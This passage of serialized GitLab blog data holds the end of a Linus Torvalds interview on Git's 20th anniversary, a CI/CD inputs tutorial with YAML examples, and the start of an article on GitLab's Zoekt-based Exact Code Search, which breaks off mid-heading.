became untenable a few months later.\n\nI was in the situation that for three years I'd finally used source control that worked, and it really had solved a lot of problems. There was no way I was going back to the days before source control, but in the years we'd been using BK, nothing better had really come out of the open source community.\n\nSure, people knew that CVS and SVN didn't work well, and there were projects that tried alternate approaches, but some of those approaches were even worse (basically amounting to \"fancy patch tracking\"), or had some good ideas but in the process making up some entirely new horrible design mistakes ([Monotone](https://www.monotone.ca/)).\n\nSo, I looked around for a while, and decided that I didn't have any options – I had to write my own.\n\nNow, technically, it actually did take only a few days to make the first version of Git, and hey, it's all there in the Git commit history. It's easy enough to see how it goes from pretty much zero to being usable enough that I started applying patches from others a week later (and being actively used for the kernel a few days after that).\n\nBut that ignores the fact that I had been *thinking* about the problem for a while by then. Writing code is easy. Getting a good design is what matters. So there was a fair amount of background to those few days that is pretty important, and that part doesn't show up in the history.\n\nAnd hey, that first version was very, very rough, and didn't do a lot that was to come later. But you can definitely already see much of the core design in those first few days.\n\n**Can you give us a short recount of the first days and weeks of how the Git project was started?**\n\nI had basically decided that I will stop kernel development until I had an alternative that worked for me. The main goals were to be distributed and high performance, and be something you could absolutely rely on to catch any corruption.\n\nBut I really do want to stress that I wasn't interested in SCMs, per se. I was interested in the end result, not in the process. So Git was never like the kernel for me: I do Linux because I think kernels are interesting - I did Git because I had to.\n\nWhich then directly segues into your next question.\n\n**You handed over the maintainership of Git to Junio Hamano after a couple of months, and Junio is still the maintainer. Why did you hand over maintainership and what made you pick Junio?**\n\nHanding over maintainership was not a hard choice. It was very much: \"The moment somebody else comes along that I can trust to keep it going, I'll go back to doing just the kernel.\"\n\nWhich is not to say that I just threw things over the wall and prayed for the best. I ended up maintaining Git for something like four months because I felt I needed to find somebody who would stick around, and had that hard-to-explain quality of \"GoodTaste\"(TM).\n\nJunio had been one of the very early people involved (he literally showed up the first week of development), but it's not like I just said, \"Tag, you're it.\"  It takes a while to see who sticks around, and who writes code and makes decisions that make sense.\n\nAnd I think Junio has been exemplary. I get much too much credit for the few months I spent on Git - particularly in light of the 20th anniversary. I'll take credit for getting the core design right, and getting the project started, but it really is Junio who has led the project (not to belittle the hundreds of other people involved, but still).\n\n**The initial version of the Mercurial version control system was released only 12 days after the initial version of Git, on April 19, 2005. Many people claim that Mercurial's user experience was superior over Git's, but nowadays Git is significantly more popular. Why do you think that Git has won over Mercurial?**\n\nOh, a big part of it is obviously just network effects, and SCMs have very strong network effects. It's why CVS survived as long as it did despite its limitations.\n\nSo, the fact that the kernel used Git (and then at some point it got to be very popular in the Ruby on Rails community, and then it took off everywhere).\n\nBut I really do think that the design of Git is superior. The core model is both very simple and very powerful, and I think that made it easier to translate into other environments. JGit was an early example of that, but you obviously have implementations like the MSgit virtual filesystem, etc.\n\nAnd while Git was famously somewhat hard to use early on, I really do think that some of that comes from having done things \"right,\" where people coming from other environments found Git non-intuitive because Git really did a few hard decisions that a traditional SCM person would never have done.\n\n**The Git project has not stood still since you handed maintainership over to Junio, and its community is always busy working on new features. What do you think the most important milestones were after you have left the project?**\n\nThat's really hard for me to say, mainly because I obviously made Git work for me, and so the things *I* use have worked from pretty much Day One. Just as an obvious example: Making Git work on Windows was obviously a huge step for other people, but it affected *me* not at all ;)\n\nThere's obviously all the infrastructure within Git itself to make it a lot easier to use, but I think most of the big milestones have all been around people taking the Git infrastructure and building things around it. Those often end up feeding back into Git features, of course, but, at the same time, the milestone is about something external.\n\nTo give an obvious example: All the big Git hosting sites were big milestones. Making Git be distributed was what made those so much easier to do, but the *milestone* was how then the hosting made it so easy for users to use Git for various projects.\n\n**If you had the capacity to work on Git full time again, would there be anything that you would like to implement?**\n\nAbsolutely not. Git did everything I really needed from very early on – my use is actually fairly limited, and I only really care about one project.\n\nAnd I say \"absolutely not\" because I refer you to that earlier answer: I was never really interested in SCMs at all to begin with. I think a large reason for why Git ended up being so different - mostly in good ways - from other SCMs was that I approached it more like I would a distributed journaling filesystem, not really a traditional SCM.\n\n**Is there any feature or design decision in Git that you have come to regret in retrospect?**\n\nDesign decisions? No. I still think the high-level design is just very good, and you can discuss various Git concepts without ever getting into the nitty-gritty complexity of actual implementation.\n\nAnd I think that's important in a project. You need a certain high-level design principle to guide the conceptual direction of a project.\n\nSometimes people take that too far, and think that the high-level design means that the implementation must then slavishly follow some core principle. And that's wrong, too – the *implementation* will have lots of nasty corner cases because reality is hard and people want odd things, but there needs to be some kind of top-level design that you can point to and reason about at a high level before you get your hands dirty with the nasty reality.\n\nAnd I think Git has a good balance of that. A very straightforward object store design (call them \"structured Merkle trees\" if you are a CS person, or you might just think of them as a \"content addressable storage\" if you are a filesystem person). That core design is there – but at the same time, it's realistically just a very tiny part of the actual code. Most of the *code* is about all the things you can do with the core design, but that basic clarity of design still gives the project some kind of high-level structure.\n\nIt's the same kind of high-level structure that Unix itself had, whether you said \"everything is a file\" or you were talking about process handling. There are a few \"concepts\" that drive the design, but then 99% of the code is about the ugly harsh details of what you build on top of that to make it all useful in the real world.\n\nI have two mantras in technology: \"If I have seen further, it is by standing on the shoulders of giants\" (Newton) and \"Genius is 1% inspiration and 99% perspiration\" (Edison).\n\nBut talking about the 99% perspiration: While I am very happy with the big design, there are certainly various details that I would have done differently if I were to do Git today.\n\nBut honestly, they aren't that important. What's much more important is all the *good* details that have been done over the last two decades.\n\n**The Linux kernel has started to use Rust as a programming language for some of its subsystems. Do you think it makes sense to start using such newer programming languages like this in Git?**\n\nI suspect that when it comes to Git, there's less reason to try to mix languages, which is always somewhat painful.\n\nIn the kernel, the end result is one single kernel binary – even if much of it can be loaded dynamically as modules, it is still linked together into effectively one single binary.\n\nAnd that makes using multiple languages more complex. But, on the other hand, the kernel also has more reason to worry about memory safety and, thus, look at newer languages.\n\nIn Git, if somebody wants to write parts of it in Rust or another language, I suspect it makes much more sense to just go for a separate implementation rather than try to mix languages in one binary.\n\nMuch of the Git core ideas are simple enough that just having parallel implementations of the core likely isn't too painful, and then you can target particular problem spaces where a different language makes more sense.\n\nAnd we've seen that in Git already, of course: That's exactly what JGit is. The use of a different language was due to a different web-based environment where that language choice was much more natural.\n\nI know that there are already Rust implementations of some of the core Git functionality, and I think the situation is similar: I suspect they make more sense in specific situations than in some kind of overall \"let's convert things to Rust\" kind of way.\n\nSo for anybody who is interested in implementing things in Rust, I'd suggest looking for target areas where the advantages of Rust are more obvious. I don't think C has actually been all that problematic in the standard Git source base.\n\n**New version control systems are popping up every couple of years. Do you think that Git will stay relevant in the future?**\n\nI already mentioned the network effects in SCMs, and I think that means that to replace Git you have to be not just slightly better, you have to be enormously better. Or so compatible that you effectively are just a new implementation of Git.\n\nAnd I do think the SCM situation has changed – Git doesn't have the kinds of huge gaping fundamental problems that SCMs had before Git. So being \"enormously better\" is fairly hard.\n\nSo, yes, I would expect Git to stay relevant for the foreseeable future, with people working on improvements *around* Git rather than replacements.\n\n*Note: This interview has been edited for length and clarity.*\n\n> Take a [journey with us through Git's 20-year history](https://about.gitlab.com/blog/journey-through-gits-20-year-history/).\n\n## Learn more about Git\n\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n- [Git project](https://git-scm.com/)",[900,983],{"slug":1083,"featured":91,"template":789},"celebrating-gits-20th-anniversary-with-creator-linus-torvalds",{"category":90,"slug":757,"posts":1085},[1086,1100,1111],{"content":1087,"config":1097},{"title":1088,"description":1089,"authors":1090,"heroImage":1092,"date":1093,"body":1094,"category":757,"tags":1095},"GitLab Patch Release: 18.1.2, 18.0.4, 17.11.6","Learn more about this patch release for GitLab Community Edition (CE) and Enterprise Edition (EE).",[1091],"Greg Myers","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749661926/Blog/Hero%20Images/security-patch-blog-image-r2-0506-700x400-fy25_2x.jpg","2025-07-09","This is the post for [GitLab Patch Release: 18.1.2, 18.0.4, 17.11.6](https://about.gitlab.com/releases/2025/07/09/patch-release-gitlab-18-1-2-released/).",[1096],"patch releases",{"featured":6,"template":789,"externalUrl":1098,"slug":1099},"https://about.gitlab.com/releases/2025/07/09/patch-release-gitlab-18-1-2-released/","gitlab-patch-release-18-1-2-18-0-4-17-11-6",{"content":1101,"config":1109},{"title":1102,"description":1103,"authors":1104,"heroImage":1106,"date":836,"body":1107,"category":757,"tags":1108},"CI/CD inputs: Secure and preferred method to pass parameters to a pipeline","Learn how CI/CD inputs provide type-safe parameter passing with validation, replacing error-prone variables for more reliable pipelines.",[1105],"Dov Hershkovitch","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749658912/Blog/Hero%20Images/blog-image-template-1800x945__20_.png","\nGitLab CI/CD inputs represent the future of pipeline parameter passing. As\na purpose-built feature designed specifically for typed parameters with\nvalidation, clear contracts, and enhanced security, inputs solve the\nfundamental challenges that teams have been working around with variables\nfor years.\n\nWhile CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.\n\nThis article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.\n\n## The hidden costs of variable-based parameter passing\n\nThe problems with using variables for parameter passing are numerous and frustrating. \n\n**No type validation**\n\nVariables are strings. There is no type validation, meaning a pipeline expecting a boolean or a number, but accidentally receives a string. This leads to unexpected failures deep into the pipeline execution. In the case of a deployment workflow for example, hours after it was started  a critical production deployment fails because a boolean check in a variable was not passed as expected.\n\n\n**Runtime mutability**\n\nVariables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets `DEPLOY_ENV=staging`, but deploy_job_b changes the `DEPLOY_ENV` value to `production`. \n\n\n**Security risks**\n\nSecurity concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple `BUILD_TYPE` parameter, that seems innocuous at first glance, suddenly has access to production secrets simply because variables do not inherently distinguish between parameters and sensitive data.\n\n\nPerhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.\n\nMany users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking \"How can we test pipelines locally?\" we started asking \"How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?\"\n\n## Understanding variable precedence\n\nGitLab's variable system includes multiple [precedence levels](https://docs.gitlab.com/ci/variables/#cicd-variable-precedence) to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.\n\n\nWhen creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.\n\n\nWhen including multiple templates, it also can be challenging to track which variables are being set where and how they might interact.\n\n\nIn addition, components authors need to document not just what variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.\n\n\n### Variable precedence examples\n\n\n**Main pipeline file (`.gitlab-ci.yml`):**\n\n\n```yaml\n\nvariables:\n  ENVIRONMENT: production  # Top-level default for all jobs\n  DATABASE_URL: prod-db.example.com\n\ninclude:\n  - local: 'templates/test-template.yml'\n  - local: 'templates/deploy-template.yml'\n```\n\n\n**Test template (`templates/test-template.yml`):**\n\n\n```yaml\n\nrun-tests:\n  variables:\n    ENVIRONMENT: test  # Job-level variable overrides the default\n  script:\n    - echo \"Running tests in $ENVIRONMENT environment\"  \n    - echo \"Database URL is $DATABASE_URL\"  # Still inherits prod-db.example.com!\n    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL\n    `# Issue: Tests run in \"test\" environment but against production database`\n\n```\n\n\n**Deploy template (`templates/deploy-template.yml`):**\n\n\n``` yaml\n\ndeploy-app:\n  script:\n    - echo \"Deploying to $ENVIRONMENT\"  # Uses production (top-level default)\n    - echo \"Database URL is $DATABASE_URL\"  # Uses prod-db.example.com\n    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL\n    # This will deploy to production as intended\n```\n\n**The challenges in this example:**\n\n\n1. Partial inheritance: The test job gets `ENVIRONMENT=test` but still inherits `DATABASE_URL=prod-db.example.com`.  \n\n2. Coordination complexity: Template authors must know what top-level variables exist and might conflict.  \n\n3. Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.  \n\n4. Hidden dependencies: Templates become dependent on the main pipeline's variable names.\n\n\nGitLab recognized these pain points and introduced [CI/CD inputs](https://docs.gitlab.com/ee/ci/inputs/) as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.\n\n\n## CI/CD inputs fundamentals\n\n\nInputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.\n\n\n### Configuration flexibility and scope\n\n\nOne of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format `$[[ inputs.input-id ]]`, meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.\n\n\nOne common use case we've seen is that users define their job names like `test-$[[ inputs.environment ]]-deployment`.\n\n\nWhen using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. Input-based job names ensure each inclusion creates uniquely named jobs.\n\n\n**Before inputs:**\n\n\n```yaml\n\ntest-service:\n  variables:\n    SERVICE_NAME: auth-service\n    ENVIRONMENT: staging\n  script:\n    - run-tests-for $SERVICE_NAME in $ENVIRONMENT\n```\n\n\n**With inputs:**\n\n\n```yaml\n\nspec:\n  inputs:\n    environment:\n      type: string\n    service_name:\n      type: string\n\ntest-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:\n  script:\n    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]\n```\n\n\nWhen included multiple times with different inputs, this creates jobs like `test-auth-service-staging`, `test-payment-service-production`, and `test-notification-service-development`. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.\n\n\nNow let's go back to the first example in the top of this blog and use inputs, one immediate benefit is that instead of maintaining multiple templates file we can use one reusable template with different input values:\n\n\n```yaml\n\nspec:\n  inputs:\n    environment:\n      type: string\n    database_url:\n      type: string\n    action:\n      type: string\n---\n\n$[[ inputs.action ]]-$[[ inputs.environment ]]:\n  script:\n    - echo \"Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment\"\n    - echo \"Database URL is $[[ inputs.database_url ]]\"\n    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]\n```\n\n\nAnd in the main `gitlab-ci.yml` file we can include it twice (or more) with different values, making sure we avoid naming collisions\n\n\n```yaml\n\ninclude:\n  - local: 'templates/environment-template.yml'\n    inputs:\n      environment: test\n      database_url: test-db.example.com\n      action: tests\n  - local: 'templates/environment-template.yml'\n    inputs:\n      environment: production\n      database_url: prod-db.example.com\n      action: deploy\n```\n\n\n**The result:** Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.\n\n\n### Validation and type safety\n\n\nAnother key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.\n\n\nHere is an example of the enormous benefit of type validation.\n\n\n**Without type validation (variables):**\n\n\n```yaml\n\nvariables:\n  ENABLE_TESTS: \"true\"  # Always a string\n  MAX_RETRIES: \"3\"      # Always a string\n\ndeploy_job:\n  script:\n    - if [ \"$ENABLE_TESTS\" = true ]; then  # This fails!\n        echo \"Running tests\"\n      fi\n    - retry_count=$((MAX_RETRIES + 1))      # String concatenation: \"31\"\n\n```\n\n\n**Problem:**  The boolean check fails because “`true`” (string) is not equal to `true`, (boolean).\n\n\n**With type validation (inputs):**\n\n\n```yaml\n\nspec:\n  inputs:\n    enable_tests:\n      type: boolean\n      default: true\n    max_retries:\n      type: number\n      default: 3\n\n      \ndeploy_job:\n  script:\n    - if [ \"$[[ inputs.enable_tests ]]\" = true ]; then  # Works correctly\n        echo \"Running tests\"\n      fi\n    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4\n\n```\n\n\n**Real-world impact for variable type validation failure**: A developer or a process triggers a GitLab CI/CD pipeline with `ENABLE_TESTS = yes` instead of `true`. Assuming it takes on average 30 minutes before the deployment job starts, then finally when this job kicks off, 30 minutes or longer into the pipeline run, the deployment script tries to evaluate the boolean and fails.  \n\n\nImagine the impact in terms of time-to-market and, of course. developer time trying to debug why a seemingly basic deploy job failed.\n\n\nWith type inputs, GitLab CI/CD will immediately throw an error and provide an explicit error message regarding the type mismatch.\n\n\n### Security and access control\n\n\nInputs provide enhanced security through controlled parameter passing with explicit contracts that define exactly what values are expected and allowed, creating clear boundaries between parameter passing to the pipeline, In addition. inputs are immutable. Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.\n\n\n### Scope and lifecycle\n\n\nWhen you define variables using the `variables:` keyword at the top level of your `.gitlab-ci.yml` file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.\n\n\nInputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.\n\n\n## Working with variables and inputs together\n\n\nWe recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.\n\n\nLet's look at this real-world example.\n\n\n**Variable expansion in rules conditions**\n\n\nA common challenge occurs when using variables that contain other variable references in `rules:if` conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:\n\n\n```yaml\n# This doesn't work as expected\n\nvariables:\n  TARGET_ENV:\n    value: \"${CI_COMMIT_REF_SLUG}\"\n\ndeploy-job:\n  rules:\n    - if: '$TARGET_ENV == \"production\"'  # Compares \"${CI_COMMIT_REF_SLUG}\" != \"production\"\n      variables:\n        DEPLOY_MODE: \"blue-green\"\n```\n\n\nThe `expand_vars` function solves this by forcing proper variable expansion in inputs:\n\n```yaml\nspec:\n  inputs:\n    target_environment:\n      description: \"Target deployment environment\"\n      default: \"${CI_COMMIT_REF_SLUG}\"\n---\n\n\ndeploy-job:\n  rules:\n    - if: '\"$[[ inputs.target_environment | expand_vars ]]\" == \"production\"'\n      variables:\n        DEPLOY_MODE: \"blue-green\"\n        APPROVAL_REQUIRED: \"true\"\n    - when: always\n      variables:\n        DEPLOY_MODE: \"rolling\"\n        APPROVAL_REQUIRED: \"false\"\n  script:\n    - echo \"Target: $[[ inputs.target_environment | expand_vars ]]\"\n    - echo \"Deploy mode: ${DEPLOY_MODE}\"\n```\n\n\n### Why this matters\n\n\nWithout `expand_vars`, rule conditions evaluate against the literal variable reference (like `\"${CI_COMMIT_REF_SLUG}\"`) rather than the expanded value (like `\"production\"`). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.\n\n\n**Important notes about expand_vars:**\n\n\n* Only variables that can be used with the include keyword are supported  \n\n* Variables must be unmasked (not marked as protected/masked)  \n\n* Nested variable expansion is not supported  \n\n* Rule conditions using `expand_vars` must be properly quoted: `'\"$[[ inputs.name | expand_vars ]]\" == \"value\"'`\n\n\nThis pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.\n\n\n### Function chaining for advanced processing\n\n\nAlong with `expand_vars`, you can use functions like `truncate` to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.\n\n\n```yaml\n\nspec:  \n  inputs:\n    service_identifier:\n      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'\n---\n\ncreate-resource:\n  script:\n    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]\n```\n\n\nThis integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.\n\n\n### From components only to CI pipelines\n\n\nUp until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the `include:` syntax. This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.\n\n\n### Pipeline-wide inputs support\n\n\nStarting with GitLab 17.11, GitLab users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:\n\n\n* Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.  \n\n* Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.  \n\n* Manual pipelines: Present users with a clean, validated form interface.\n\n\nThose enhancements, with more to follow, allow teams to modernize their pipelines while maintaining backward compatibility gradually. Once inputs are fully adopted, users can disable pipeline variables to ensures a more secure and predictable CI/CD environment.\n\n\n## Summary\n\n\nThe transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.\n\n\nWe understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The `expand_vars` function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.\n\n\nBy starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. Additionally, moving to inputs creates an excellent foundation for leveraging [GitLab's CI/CD Catalog](https://gitlab.com/explore/catalog), where reusable components with typed interfaces become powerful building blocks for your DevOps workflows but more on that in our next blog post.\n\n\nYour future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.\n\n\n## What's next \n\n\nLooking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that [dynamically adjust based on user selections](https://gitlab.com/gitlab-org/gitlab/-/issues/520094), and providing job-level inputs that allow users to [retry individual jobs with different parameter values](https://gitlab.com/groups/gitlab-org/-/epics/17833). We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. You can also provide general feedback on CI/CD inputs through our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/407556).\n\n## Read more\n\n- [How to include file references in your CI/CD components](https://about.gitlab.com/blog/how-to-include-file-references-in-your-ci-cd-components/)\n- [CI/CD inputs documentation](https://docs.gitlab.com/ci/inputs/)\n- [CI/CD Catalog goes GA: No more building pipelines from scratch](https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/)\n- [GitLab environment variables demystified](https://about.gitlab.com/blog/demystifying-ci-cd-variables/)\n",[109,757,767],{"featured":6,"template":789,"slug":1110},"ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline",{"content":1112,"config":1121},{"title":1113,"description":1114,"authors":1115,"heroImage":1117,"date":1118,"body":1119,"category":757,"tags":1120},"Exact Code Search: Find code faster across repositories","Discover how this new GitLab feature can find exact matches, use regex patterns, and see contextual results across terabytes of codebases.",[1116],"Dmitry Gruzd","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675154/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","2025-06-25","**TL;DR:** What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new [Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html) makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.\n## Why traditional code search is challenging\n\nAnyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.\n\nThese conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.\n\nGitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After [evaluating numerous options](https://gitlab.com/groups/gitlab-org/-/epics/7404), we developed a better solution.\n\n## Introducing Exact Code Search: Three game-changing capabilities\n\nEnter GitLab's **[Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html)**, currently in beta testing and powered by [Zoekt](https://github.com/sourcegraph/zoekt) (pronounced \"zookt\", Dutch for \"search\"). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.\n\nThis feature revolutionizes how you find and understand code with three key capabilities:\n\n**1. Exact Match mode: Zero false positives**\n\nWhen toggled to **Exact Match mode**, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:\n\n* Searching for specific error messages\n* Looking for particular function signatures\n* Finding instances of specific variable names\n\n**2. Regular Expression mode: Powerful pattern matching**\n\nFor complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:\n\n* Find functions following specific naming patterns\n* Locate variables matching certain constraints\n* Identify potential security vulnerabilities using pattern matching\n\n**3. Multiple-line matches: See code in context**\n\n![Exact Code Search](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png)\n\nInstead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.\n\n## From features to workflows: Real-world use cases and impact\n\nLet's see how these capabilities translate to real productivity gains in everyday development scenarios:\n\n### Debugging: From error message to root cause in seconds\n\nBefore Exact Code Search:\nCopy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.\n\nWith Exact Code Search:\n\n1. Copy the exact error message\n2. Paste it into Exact Code Search with Exact Match mode\n3. Instantly find the precise location where the error is thrown, with surrounding context\n\n**Impact:** Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.\n\n### Code exploration: Master unfamiliar codebases quickly\n\nBefore Exact Code Search:\nBrowse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.\n\nWith Exact Code Search:\n\n* Search for key methods or classes with Exact Match mode\n* Review multiple line matches to understand implementation details\n* Use Regular Expression mode to find similar patterns across the codebase\n\n**Impact:** Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.\n\n### Refactoring with confidence\n\nBefore Exact Code Search:\nAttempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.\n\nWith Exact Code Search:\n\n* Use Exact Match mode to find all occurrences of methods or variables\n* Review context to understand usage patterns\n* Plan your refactoring with complete information about impact\n\n**Impact:** Eliminate the \"missed instance\" bugs that often plague refactoring efforts, improving code quality and reducing rework.\n\n### Security auditing: Finding vulnerable patterns\n\nSecurity teams can:\n\n* Create regex patterns matching known vulnerable code\n* Search across all repositories in a namespace\n* Quickly identify potential security issues with context that helps assess risk\n\n**Impact:** Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.\n\n### Cross-repository insights\n\nSearch across your entire namespace or instance to:\n\n* Identify similar implementations across different projects\n* Discover opportunities for shared libraries or standardization\n\n**Impact:** Break down silos between projects and identify opportunities for code reuse and standardization.\n\n## The technical foundation: How Zoekt delivers speed and precision\n\nBefore diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.\n\n### Positional trigrams: The secret to lightning-fast exact matches\n\nZoekt's speed comes from its use of **positional trigrams** — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.\n\nHere's how it works:\n\n**Traditional full-text search engines** like Elasticsearch tokenize code into words and lose positional information. When you search for `getUserId()`, they might return results containing **user**, **get**, and **Id** scattered throughout a file — leading to those frustrating false positives for GitLab users.\n\n**Zoekt's positional trigrams** maintain exact character sequences and their positions. When you search for `getUserId()`, Zoekt looks for the exact trigrams like **get**, **etU**, **tUs**, **Use**, **ser**, **erI**, **rId**, **Id(\", \"d()**, all in the correct sequence and position. This ensures that only exact matches are returned.\n\nThe result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was [one of our most requested features](https://gitlab.com/gitlab-org/gitlab/-/issues/325234) for good reason - developers were losing significant time sifting through false positives.\n\n### Regular expression performance at 